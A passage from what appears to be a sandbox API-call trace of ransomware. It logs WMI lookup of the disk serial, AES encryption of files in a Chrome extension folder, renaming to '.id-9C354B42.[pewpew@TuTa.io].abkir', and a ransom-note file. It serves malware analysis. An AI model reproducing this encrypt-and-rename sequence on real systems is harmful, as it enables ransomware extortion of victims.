[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2b4 | out: ppvObject=0x949e2b4*=0x66b46dc) returned 0x0 [0202.959] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e270 | out: ppvObject=0x949e270*=0x0) returned 0x80004002 [0202.962] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e08c | out: ppvObject=0x949e08c*=0x0) returned 0x80004002 [0202.963] WbemLocator:IUnknown:AddRef (This=0x66b46dc) returned 0x3 [0202.963] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbcc | out: ppvObject=0x949dbcc*=0x0) returned 0x80004002 [0202.965] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db7c | out: ppvObject=0x949db7c*=0x0) returned 0x80004002 [0202.968] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db88 | out: ppvObject=0x949db88*=0x66b463c) returned 0x0 [0202.968] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66b463c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949db90 | out: pCid=0x949db90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.969] WbemLocator:IUnknown:Release (This=0x66b463c) returned 0x3 [0202.969] CoGetContextToken (in: pToken=0x949dbe8 | out: pToken=0x949dbe8) returned 0x0 [0202.969] CoGetContextToken (in: pToken=0x949dff0 | out: pToken=0x949dff0) returned 0x0 [0202.969] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e080 | out: ppvObject=0x949e080*=0x66b46c4) returned 0x0 [0202.969] WbemLocator:IRpcOptions:Query (in: This=0x66b46c4, pPrx=0x66b46dc, dwProperty=2, pdwValue=0x949e0a8 | out: pdwValue=0x949e0a8) returned 0x80004002 [0202.969] WbemLocator:IUnknown:Release (This=0x66b46c4) returned 0x3 [0202.969] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x2 [0202.969] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0202.969] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0202.969] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x949e5f8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e5f4 | out: ppvObject=0x949e5f4*=0x60334d4) returned 0x0 [0202.969] WbemLocator:IUnknown:AddRef (This=0x60334d4) returned 0x4 [0202.969] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x3 [0202.969] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x2 [0202.969] SysStringLen (param_1=0x0) returned 0x0 [0202.969] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949e98c | out: puCount=0x949e98c*=0x0) returned 0x0 [0202.969] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949e988*=0x0, pszText=0x0 | out: puBuffLength=0x949e988*=0x20, pszText=0x0) returned 0x0 [0202.969] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949e988*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e988*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.969] CoGetContextToken (in: pToken=0x949e5f8 | out: pToken=0x949e5f8) returned 0x0 [0202.969] WbemLocator:IUnknown:AddRef (This=0x66b46dc) returned 0x3 [0202.969] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e48c | out: ppvObject=0x949e48c*=0x66b46dc) returned 0x0 [0202.970] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x3 [0202.970] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x2 [0202.970] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949e990*=0x0, pszText=0x0 | out: puBuffLength=0x949e990*=0x20, pszText=0x0) returned 0x0 [0202.970] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949e990*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e990*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.970] IWbemServices:GetObject (in: This=0x60334d4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e944*=0x0, ppCallResult=0x0 | out: ppObject=0x949e944*=0x6028648, ppCallResult=0x0) returned 0x0 [0203.165] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949e944 | out: puCount=0x949e944*=0x2) returned 0x0 [0203.165] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x949e940*=0x0, pszText=0x0 | out: puBuffLength=0x949e940*=0xf, pszText=0x0) returned 0x0 [0203.165] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x949e940*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e940*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.165] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e940*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36c39cc*=0, plFlavor=0x36c39d0*=0 | out: pVal=0x949e940*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36c39cc*=8, plFlavor=0x36c39d0*=0) returned 0x0 [0203.165] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.165] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.165] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e948*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36c39cc*=8, plFlavor=0x36c39d0*=0 | out: pVal=0x949e948*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36c39cc*=8, plFlavor=0x36c39d0*=0) returned 0x0 [0203.165] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.165] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", lpFilePart=0x0) returned 0x8a [0203.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xad [0203.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9a8) returned 1 [0203.165] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), fInfoLevelId=0x0, lpFileInformation=0x949ea24 | out: lpFileInformation=0x949ea24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x32495c80, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0203.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9a4) returned 1 [0203.166] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0203.166] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", nBufferLength=0x105, lpBuffer=0x949e560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", lpFilePart=0x0) returned 0x89 [0203.166] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", lpFilePart=0x0) returned 0x8e [0203.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9c8) returned 1 [0203.166] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949ea44 | out: lpFileInformation=0x949ea44*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31f86dc0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x31f86dc0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x31f86dc0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0203.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9c4) returned 1 [0203.167] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", lpFilePart=0x0) returned 0x89 [0203.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea14) returned 1 [0203.167] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), fInfoLevelId=0x0, lpFileInformation=0x36c4448 | out: lpFileInformation=0x36c4448*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa0)) returned 1 [0203.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea10) returned 1 [0203.167] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", nBufferLength=0x105, lpBuffer=0x949e454, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", lpFilePart=0x0) returned 0x89 [0203.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e948) returned 1 [0203.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0203.167] GetFileType (hFile=0x32c) returned 0x1 [0203.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e944) returned 1 [0203.167] GetFileType (hFile=0x32c) returned 0x1 [0203.167] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x949ea50 | out: lpFileSizeHigh=0x949ea50*=0x0) returned 0xa0 [0203.167] ReadFile (in: hFile=0x32c, lpBuffer=0x36c480c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e9fc, lpOverlapped=0x0 | out: lpBuffer=0x36c480c*, lpNumberOfBytesRead=0x949e9fc*=0xa0, lpOverlapped=0x0) returned 1 [0203.168] CloseHandle (hObject=0x32c) returned 1 [0203.168] CryptAcquireContextW (in: phProv=0x949e99c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e99c*=0xbdf6a0) returned 1 [0203.169] CryptGenRandom (in: hProv=0xbdf6a0, dwLen=0x10, pbBuffer=0x36d8b64 | out: pbBuffer=0x36d8b64) returned 1 [0203.774] CryptImportKey (in: hProv=0xbdf6a0, pbData=0x370128c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e96c | out: phKey=0x949e96c*=0xb7f9d0) returned 1 [0203.774] CryptContextAddRef (hProv=0xbdf6a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.775] CryptContextAddRef (hProv=0xbdf6a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.775] CryptDuplicateKey (in: hKey=0xb7f9d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e95c | out: phKey=0x949e95c*=0xb7f1d0) returned 1 [0203.775] CryptContextAddRef (hProv=0xbdf6a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.775] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x4, pbData=0x370136c*=0x1, dwFlags=0x0) returned 1 [0203.775] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x1, pbData=0x3701338, dwFlags=0x0) returned 1 [0203.775] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x370137c*, pdwDataLen=0x949e9c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x370137c*, pdwDataLen=0x949e9c8*=0xb0) returned 1 [0203.775] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3701450*, pdwDataLen=0x949e9d0*=0x0, dwBufLen=0x10 | out: pbData=0x3701450*, pdwDataLen=0x949e9d0*=0x10) returned 1 [0203.776] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0203.776] CryptReleaseContext (hProv=0xbdf6a0, dwFlags=0x0) returned 1 [0203.776] CryptReleaseContext (hProv=0xbdf6a0, dwFlags=0x0) returned 1 [0203.777] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", nBufferLength=0x105, lpBuffer=0x949e440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", lpFilePart=0x0) returned 0x89 [0203.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e934) returned 1 [0203.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0203.841] GetFileType (hFile=0x32c) returned 0x1 [0203.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e930) returned 1 [0203.841] GetFileType (hFile=0x32c) returned 0x1 [0203.841] WriteFile (in: hFile=0x32c, lpBuffer=0x3793b58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e9c4, lpOverlapped=0x0 | out: lpBuffer=0x3793b58*, lpNumberOfBytesWritten=0x949e9c4*=0x20, lpOverlapped=0x0) returned 1 [0203.841] CloseHandle (hObject=0x32c) returned 1 [0203.842] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0203.842] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0203.842] CoTaskMemFree (pv=0xbed438) [0203.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0204.005] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e970 | out: ppv=0x949e970*=0xb51e34) returned 0x0 [0204.005] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e968 | out: pAptType=0x949e968*=1) returned 0x0 [0204.005] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e96c | out: ppvObject=0x949e96c*=0x0) returned 0x80004002 [0204.005] IUnknown:Release (This=0xb51e34) returned 0x1 [0204.006] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2d8 | out: ppv=0x949e2d8*=0x6027280) returned 0x0 [0204.006] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027280, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4f0 | out: ppvObject=0x949e4f0*=0x0) returned 0x80004002 [0204.006] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027280, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e504 | out: ppvObject=0x949e504*=0x602a0d0) returned 0x0 [0204.006] WbemDefPath:IUnknown:Release (This=0x6027280) returned 0x0 [0204.006] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a0d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e124 | out: ppvObject=0x949e124*=0x602a0d0) returned 0x0 [0204.006] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a0d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0e0 | out: ppvObject=0x949e0e0*=0x0) returned 0x80004002 [0204.006] WbemDefPath:IUnknown:AddRef (This=0x602a0d0) returned 0x3 [0204.006] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a0d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da3c | out: ppvObject=0x949da3c*=0x0) returned 0x80004002 [0204.007] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a0d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9ec | out: ppvObject=0x949d9ec*=0x0) returned 0x80004002 [0204.007] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a0d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9f8 | out: ppvObject=0x949d9f8*=0x66ce268) returned 0x0 [0204.007] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce268, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949da00 | out: pCid=0x949da00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.007] WbemDefPath:IUnknown:Release (This=0x66ce268) returned 0x3 [0204.007] CoGetContextToken (in: pToken=0x949da58 | out: pToken=0x949da58) returned 0x0 [0204.007] CoGetContextToken (in: pToken=0x949de60 | out: pToken=0x949de60) returned 0x0 [0204.007] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a0d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949def0 | out: ppvObject=0x949def0*=0x0) returned 0x80004002 [0204.007] WbemDefPath:IUnknown:Release (This=0x602a0d0) returned 0x2 [0204.007] WbemDefPath:IUnknown:Release (This=0x602a0d0) returned 0x1 [0204.007] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0204.007] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0204.007] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a0d0, riid=0x949e818*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x602a0d0) returned 0x0 [0204.007] WbemDefPath:IUnknown:AddRef (This=0x602a0d0) returned 0x3 [0204.007] WbemDefPath:IUnknown:Release (This=0x602a0d0) returned 0x2 [0204.007] WbemDefPath:IWbemPath:SetText (This=0x602a0d0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.007] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a0d0, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0204.007] WbemDefPath:IWbemPath:GetText (in: This=0x602a0d0, lFlags=2, puBuffLength=0x949e998*=0x0, pszText=0x0 | out: puBuffLength=0x949e998*=0x20, pszText=0x0) returned 0x0 [0204.007] WbemDefPath:IWbemPath:GetText (in: This=0x602a0d0, 